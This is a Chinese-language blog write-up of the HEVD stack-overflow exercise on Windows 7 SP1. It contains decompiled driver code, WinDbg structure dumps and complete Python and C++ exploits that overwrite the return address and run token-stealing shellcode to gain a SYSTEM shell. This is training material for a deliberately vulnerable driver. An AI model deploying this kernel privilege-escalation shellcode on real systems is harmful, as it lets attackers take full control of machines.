2021-03-26 ycdxsb research / HEVD13 分钟读完 (大约 1961 个字) 0次访问

HEVD StackOverFlow [win7sp1]

HEVD 系列第一类漏洞StackOverFlow

漏洞分析#

漏洞点#

可以看到漏洞原因在于从UserBuffer拷贝到KernelBuffer时，由于size使用了UserBuffer的大小，因此造成了栈溢出漏洞

触发路径#

IDA逆向后可以看到触发路径为

int __stdcall IrpDeviceIoCtlHandler(_DEVICE_OBJECT *DeviceObject, _IRP *Irp)
{
  int v2; // ebx
  _IO_STACK_LOCATION *v3; // eax
  _IO_STACK_LOCATION *v4; // ebx
  void (*v5)(ULONG, ULONG, PCSTR, ...); // esi
  int v6; // eax
  const char *v8; // [esp-4h] [ebp-10h]

  v2 = -1073741637;
  v3 = Irp->Tail.Overlay.CurrentStackLocation;
  if ( v3 )
  {
    v4 = Irp->Tail.Overlay.CurrentStackLocation;
    switch ( v3->Parameters.Read.ByteOffset.LowPart )
    {
      case 0x222003u:
        v5 = (void (*)(ULONG, ULONG, PCSTR, ...))_DbgPrintEx;
        _DbgPrintEx(0x4Du, 3u, "****** HEVD_IOCTL_BUFFER_OVERFLOW_STACK ******\n");
        v6 = BufferOverflowStackIoctlHandler(Irp, v4);
        v8 = "****** HEVD_IOCTL_BUFFER_OVERFLOW_STACK ******\n";
        goto LABEL_4;
        ....
     }
   }
}

int __stdcall BufferOverflowStackIoctlHandler(_IRP *Irp, _IO_STACK_LOCATION *IrpSp)
{
  int v2; // ecx
  _NAMED_PIPE_CREATE_PARAMETERS *v3; // edx

  v2 = -1073741823;
  v3 = IrpSp->Parameters.CreatePipe.Parameters;
  if ( v3 )
    v2 = TriggerBufferOverflowStack(v3, IrpSp->Parameters.Create.Options);
  return v2;
}


int __stdcall TriggerBufferOverflowStack(void *UserBuffer, unsigned int Size)
{
  unsigned int KernelBuffer[512]; // [esp+10h] [ebp-81Ch]
  CPPEH_RECORD ms_exc; // [esp+814h] [ebp-18h]

  memset(KernelBuffer, 0, 0x800u);
  ms_exc.registration.TryLevel = 0;
  ProbeForRead(UserBuffer, 0x800u, 1u);
  _DbgPrintEx(0x4Du, 3u, "[+] UserBuffer: 0x%p\n", UserBuffer);
  _DbgPrintEx(0x4Du, 3u, "[+] UserBuffer Size: 0x%X\n", Size);
  _DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer: 0x%p\n", KernelBuffer);
  _DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer Size: 0x%X\n", 2048);
  _DbgPrintEx(0x4Du, 3u, "[+] Triggering Buffer Overflow in Stack\n");
  memcpy(KernelBuffer, UserBuffer, Size);
  return 0;
}

也就是说读入参数为0x222003时，就会走栈溢出漏洞的路径

漏洞利用#

payload#

从函数中可以看到KernelBuffer位于[ebp - 0x81C]处，也就是需要覆盖0x81c + 4 = 0x820个字节到ebp，最后修改ret地址为UserBuffer地址，执行用户态的shellcode，即可实现提权
payload = 'a'*0x820 + UserBufferAddress

shellcode#

HEVD官方使用的shellcode如下：

VOID TokenStealingPayloadWin7() {
    // Importance of Kernel Recovery
    __asm {
        pushad                               ; Save registers state

        ; Start of Token Stealing Stub
        xor eax, eax                         ; Set ZERO
        mov eax, fs:[eax + KTHREAD_OFFSET]   ; Get nt!_KPCR.PcrbData.CurrentThread
                                             ; _KTHREAD is located at FS:[0x124]

        mov eax, [eax + EPROCESS_OFFSET]     ; Get nt!_KTHREAD.ApcState.Process

        mov ecx, eax                         ; Copy current process _EPROCESS structure

        mov edx, SYSTEM_PID                  ; WIN 7 SP1 SYSTEM process PID = 0x4

        SearchSystemPID:
            mov eax, [eax + FLINK_OFFSET]    ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
            sub eax, FLINK_OFFSET
            cmp [eax + PID_OFFSET], edx      ; Get nt!_EPROCESS.UniqueProcessId
            jne SearchSystemPID

        mov edx, [eax + TOKEN_OFFSET]        ; Get SYSTEM process nt!_EPROCESS.Token
        mov [ecx + TOKEN_OFFSET], edx        ; Replace target process nt!_EPROCESS.Token
                                             ; with SYSTEM process nt!_EPROCESS.Token
        ; End of Token Stealing Stub

        popad                                ; Restore registers state

        ; Kernel Recovery Stub
        xor eax, eax                         ; Set NTSTATUS SUCCEESS
        add esp, 12                          ; Fix the stack
        pop ebp                              ; Restore saved EBP
        ret 8                                ; Return cleanly
    }
}

作用是：找到System进程的token，与exp进程的token进行替换

kd> r fs
fs=00000030
kd> dd fs:[0x124]
0030:00000124  83f8a380 00000000 83f8a380 00000100
0030:00000134  9e0d0106 0001003f 00000000 00000000
0030:00000144  00000000 00000000 ffff0ff0 00000400
0030:00000154  00000000 00000000 00000000 00000000
0030:00000164  00000000 00000000 00000000 00000000
0030:00000174  00000000 00000000 00000000 00000000
0030:00000184  00000000 00000000 00000000 00000000
0030:00000194  00000000 00000000 83f19ae7 83e5cf64
kd> !pcr
KPCR for Processor 0 at 83f80c00:
    Major 1 Minor 1
	NtTib.ExceptionList: 83f7d0ac
	    NtTib.StackBase: 00000000
	   NtTib.StackLimit: 00000000
	 NtTib.SubSystemTib: 801e4000
	      NtTib.Version: 003b53a6
	  NtTib.UserPointer: 00000001
	      NtTib.SelfTib: 00000000

	            SelfPcr: 83f80c00
	               Prcb: 83f80d20
	               Irql: 0000001f
	                IRR: 00000000
	                IDR: ffffffff
	      InterruptMode: 00000000
	                IDT: 80b95400
	                GDT: 80b95000
	                TSS: 801e4000

	      CurrentThread: 83f8a380
	         NextThread: 00000000
	         IdleThread: 83f8a380

	          DpcQueue:

可以看到fs:[124]存放的是CurrentThread的地址，结构为KTHREAD

nt!_KPCR结构
KPCR表示内核进程控制区域。它包含了每个CPU的信息，被内核和HAL所共享。系统有几个CPU，就有几个KPCR。
当前CPU的KPCR总是可以通过fs:[0]在x86系统上访问，x64系统上则通过gs:[0]。通用的内核函数诸如PsGetCurrentProcess()和KeGetCurrentThread()会利用FS/GS相对访问来从KPCR中获取信息。
Prcb字段包含了一个内嵌的KPRCB结构体，用于表示内核进程控制块。

kd> dt _KTHREAD 83f8a380
ntdll!_KTHREAD
   +0x000 Header           : _DISPATCHER_HEADER
   +0x010 CycleTime        : 0x000012e7`3b6f4958
   +0x018 HighCycleTime    : 0x12e7
   +0x020 QuantumTarget    : 0x00000008`f36dc08d
   +0x028 InitialStack     : 0x83f7ded0 Void
   +0x02c StackLimit       : 0x83f7b000 Void
   +0x030 KernelStack      : 0x83f7dc1c Void
   +0x034 ThreadLock       : 0
   +0x038 WaitRegister     : _KWAIT_STATUS_REGISTER
   +0x039 Running          : 0x1 ''
   +0x03a Alerted          : [2]  ""
   +0x03c KernelStackResident : 0y1
   +0x03c ReadyTransition  : 0y0
   +0x03c ProcessReadyQueue : 0y0
   +0x03c WaitNext         : 0y0
   +0x03c SystemAffinityActive : 0y0
   +0x03c Alertable        : 0y0
   +0x03c GdiFlushActive   : 0y0
   +0x03c UserStackWalkActive : 0y0
   +0x03c ApcInterruptRequest : 0y0
   +0x03c ForceDeferSchedule : 0y0
   +0x03c QuantumEndMigrate : 0y0
   +0x03c UmsDirectedSwitchEnable : 0y0
   +0x03c TimerActive      : 0y0
   +0x03c SystemThread     : 0y1
   +0x03c Reserved         : 0y000000000000000000 (0)
   +0x03c MiscFlags        : 0n8193
   +0x040 ApcState         : _KAPC_STATE
kd> dt _KAPC_STATE
ntdll!_KAPC_STATE
   +0x000 ApcListHead      : [2] _LIST_ENTRY
   +0x010 Process          : Ptr32 _KPROCESS
   +0x014 KernelApcInProgress : UChar
   +0x015 KernelApcPending : UChar
   +0x016 UserApcPending   : UChar

[KTHREAD + 0x50]是KTHREAD.ApcState.Process，结构为KPROCESS，KPROCESS是EPROCESS结构的第一个字段，因此可以索引到EPROCESS结构

kd> dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x098 ProcessLock      : _EX_PUSH_LOCK
   +0x0a0 CreateTime       : _LARGE_INTEGER
   +0x0a8 ExitTime         : _LARGE_INTEGER
   +0x0b0 RundownProtect   : _EX_RUNDOWN_REF
   +0x0b4 UniqueProcessId  : Ptr32 Void
   +0x0b8 ActiveProcessLinks : _LIST_ENTRY

EPROCESS的0xb8处是进程双向链表，遍历进程双向链表，可以找到System进程，System进程的EPRCESS的0xf8位置是token位置

kd> dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x098 ProcessLock      : _EX_PUSH_LOCK
   +0x0a0 CreateTime       : _LARGE_INTEGER
   +0x0a8 ExitTime         : _LARGE_INTEGER
   +0x0b0 RundownProtect   : _EX_RUNDOWN_REF
   +0x0b4 UniqueProcessId  : Ptr32 Void
   +0x0b8 ActiveProcessLinks : _LIST_ENTRY
   +0x0c0 ProcessQuotaUsage : [2] Uint4B
   +0x0c8 ProcessQuotaPeak : [2] Uint4B
   +0x0d0 CommitCharge     : Uint4B
   +0x0d4 QuotaBlock       : Ptr32 _EPROCESS_QUOTA_BLOCK
   +0x0d8 CpuQuotaBlock    : Ptr32 _PS_CPU_QUOTA_BLOCK
   +0x0dc PeakVirtualSize  : Uint4B
   +0x0e0 VirtualSize      : Uint4B
   +0x0e4 SessionProcessLinks : _LIST_ENTRY
   +0x0ec DebugPort        : Ptr32 Void
   +0x0f0 ExceptionPortData : Ptr32 Void
   +0x0f0 ExceptionPortValue : Uint4B
   +0x0f0 ExceptionPortState : Pos 0, 3 Bits
   +0x0f4 ObjectTable      : Ptr32 _HANDLE_TABLE
   +0x0f8 Token            : _EX_FAST_REF
kd> dt _EX_FAST_REF
ntdll!_EX_FAST_REF
   +0x000 Object           : Ptr32 Void
   +0x000 RefCnt           : Pos 0, 3 Bits
   +0x000 Value            : Uint4B

token的低三位是引用计数，去除引用计数后的地址是实际token地址，我们直接看下System的token

kd> !process 4 0 
Searching for Process with Cid == 4
PROCESS 85801a20  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00185000  ObjectTable: 89201b60  HandleCount: 534.
    Image: System

kd> dt _EX_FAST_REF 85801a20+f8
ntdll!_EX_FAST_REF
   +0x000 Object           : 0x892012c7 Void
   +0x000 RefCnt           : 0y111
   +0x000 Value            : 0x892012c7
kd> !token 0x892012c7 & 0xfffffff8
_TOKEN 0xffffffff892012c0
TS Session ID: 0
User: S-1-5-18
User Groups: 
 00 S-1-5-32-544
    Attributes - Default Enabled Owner 
 01 S-1-1-0
    Attributes - Mandatory Default Enabled 
 02 S-1-5-11
    Attributes - Mandatory Default Enabled 
 03 S-1-16-16384
    Attributes - GroupIntegrity GroupIntegrityEnabled 
Primary Group: S-1-5-18
Privs: 
 02 0x000000002 SeCreateTokenPrivilege            Attributes - 
 03 0x000000003 SeAssignPrimaryTokenPrivilege     Attributes - 
 04 0x000000004 SeLockMemoryPrivilege             Attributes - Enabled Default 
 05 0x000000005 SeIncreaseQuotaPrivilege          Attributes - 
 07 0x000000007 SeTcbPrivilege                    Attributes - Enabled Default 
 08 0x000000008 SeSecurityPrivilege               Attributes - 
 09 0x000000009 SeTakeOwnershipPrivilege          Attributes - 
 10 0x00000000a SeLoadDriverPrivilege             Attributes - 
 11 0x00000000b SeSystemProfilePrivilege          Attributes - Enabled Default 
 12 0x00000000c SeSystemtimePrivilege             Attributes - 
 13 0x00000000d SeProfileSingleProcessPrivilege   Attributes - Enabled Default 
 14 0x00000000e SeIncreaseBasePriorityPrivilege   Attributes - Enabled Default 
 15 0x00000000f SeCreatePagefilePrivilege         Attributes - Enabled Default 
 16 0x000000010 SeCreatePermanentPrivilege        Attributes - Enabled Default 
 17 0x000000011 SeBackupPrivilege                 Attributes - 
 18 0x000000012 SeRestorePrivilege                Attributes - 
 19 0x000000013 SeShutdownPrivilege               Attributes - 
 20 0x000000014 SeDebugPrivilege                  Attributes - Enabled Default 
 21 0x000000015 SeAuditPrivilege                  Attributes - Enabled Default 
 22 0x000000016 SeSystemEnvironmentPrivilege      Attributes - 
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default 
 25 0x000000019 SeUndockPrivilege                 Attributes - 
 28 0x00000001c SeManageVolumePrivilege           Attributes - 
 29 0x00000001d SeImpersonatePrivilege            Attributes - Enabled Default 
 30 0x00000001e SeCreateGlobalPrivilege           Attributes - Enabled Default 
 31 0x00000001f SeTrustedCredManAccessPrivilege   Attributes - 
 32 0x000000020 SeRelabelPrivilege                Attributes - 
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes - Enabled Default 
 34 0x000000022 SeTimeZonePrivilege               Attributes - Enabled Default 
 35 0x000000023 SeCreateSymbolicLinkPrivilege     Attributes - Enabled Default

python2.7 exp#

# coding=UTF-8
import sys
import struct
from ctypes import *
from subprocess import *
kernel32 = windll.kernel32

def open_driver():
    hevd = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 
                                0xC0000000, # 1100 0000 读取方式 READ / Write
                                0, # 共享模式 No Sharing
                                None, # 安全属性 No Security, NULL
                                0x3, # 0011 只读和隐藏属性
                                0, 
                                None) # NULL
    if(hevd == -1 or not hevd ):
        print("[-] Failed to open hevd")
        exit(-1)
    else:
        print("[+] Sucessful open hevd")
    return hevd

def pwn(hevd):
    shellcode = bytearray(
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz 0x1a
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
    "\x5d"
    "\xc2\x08\x00")

    print("[*] Allocating shellcode character array...")
    userbuffer_addr = (c_char * len(shellcode)).from_buffer(shellcode)
    ptr = addressof(userbuffer_addr)

    print("[*] Marking shellcode RWX...")
    
    result = kernel32.VirtualProtect(
        userbuffer_addr,
        c_int(len(shellcode)),
        c_int(0x40),
        byref(c_ulong())
    )

    if result != 0:
        print("[+] Successfully marked shellcode RWX.")
    else:
        print("[-] Failed to mark shellcode RWX.")
        exit(-1)

    payload = struct.pack("<L",ptr)

    buf = "A" * 2080
    buf += payload
    buf_length = len(buf)
    
    print("[*] Sending payload to driver...")
    result = kernel32.DeviceIoControl(
        hevd,
        0x222003,
        buf,
        buf_length,
        None,
        0,
        byref(c_ulong()),
        None
    )

    if result != 0:
        print("[+] Payload sent.")
    else:
        print("[-] Unable to send payload to driver.")
        exit(-1)

    try:
        print("[*] Spawning cmd shell with SYSTEM privs...")
        Popen(
            'start cmd',
            shell=True
        )
    except:
        print("[-] Failed to spawn cmd shell.")
        exit(-1)


if __name__ == "__main__":
    hevd = open_driver()
    pwn(hevd)

c++ exp(vs2017)#

#include<stdio.h>
#include<Windows.h>

int main()
{
	HANDLE hevd = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
		GENERIC_READ | GENERIC_WRITE,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
		NULL);

	if (hevd == INVALID_HANDLE_VALUE) {
		wprintf(L"[-] Failed to open hevd\n");
		exit(-1);
	}
	else {
		wprintf(L"[+] Success to open hevd\n");
	}

	LPVOID Buffer = VirtualAlloc(NULL,
		4096,
		MEM_COMMIT | MEM_RESERVE,
		PAGE_EXECUTE_READWRITE);

	char shellcode[] =
		"\x60"                            // pushad
		"\x31\xc0"                        // xor eax, eax
		"\x64\x8b\x80\x24\x01\x00\x00"    // mov eax, [fs:eax + 0x124]
		"\x8b\x40\x50"                    // mov eax, [eax + 0x50]
		"\x89\xc1"                        // mov ecx, eax
		"\xba\x04\x00\x00\x00"            // mov edx, 0x4
		"\x8b\x80\xb8\x00\x00\x00"        // mov eax, [eax + 0xb8]
		"\x2d\xb8\x00\x00\x00"            // sub eax, 0xb8
		"\x39\x90\xb4\x00\x00\x00"        // cmp[eax + 0xb4], edx
		"\x75\xed"                        // jnz 0x1a
		"\x8b\x90\xf8\x00\x00\x00"        // mov edx, [eax + 0xf8]
		"\x89\x91\xf8\x00\x00\x00"        // mov[ecx + 0xf8], edx
		"\x61"                            // popad
		"\x5d"
		"\xc2\x08\x00";

	RtlCopyMemory(Buffer, shellcode, 61);
	DWORD *ret = (DWORD*)((int)Buffer + 2080);
	*ret = (DWORD)Buffer;
	DWORD byteret;

	bool result = DeviceIoControl(hevd,
		0x222003,
		Buffer,
		2080 + 4,
		NULL,
		0,
		&byteret,
		NULL);

	if (result == 0) {
		wprintf(L"[-] Failed send payload\n");
		exit(-1);
	}
	else {
		wprintf(L"[+] Success send payload\n");
	}

	system("cmd.exe");
	return 0;
}

参考资料#

#research HEVD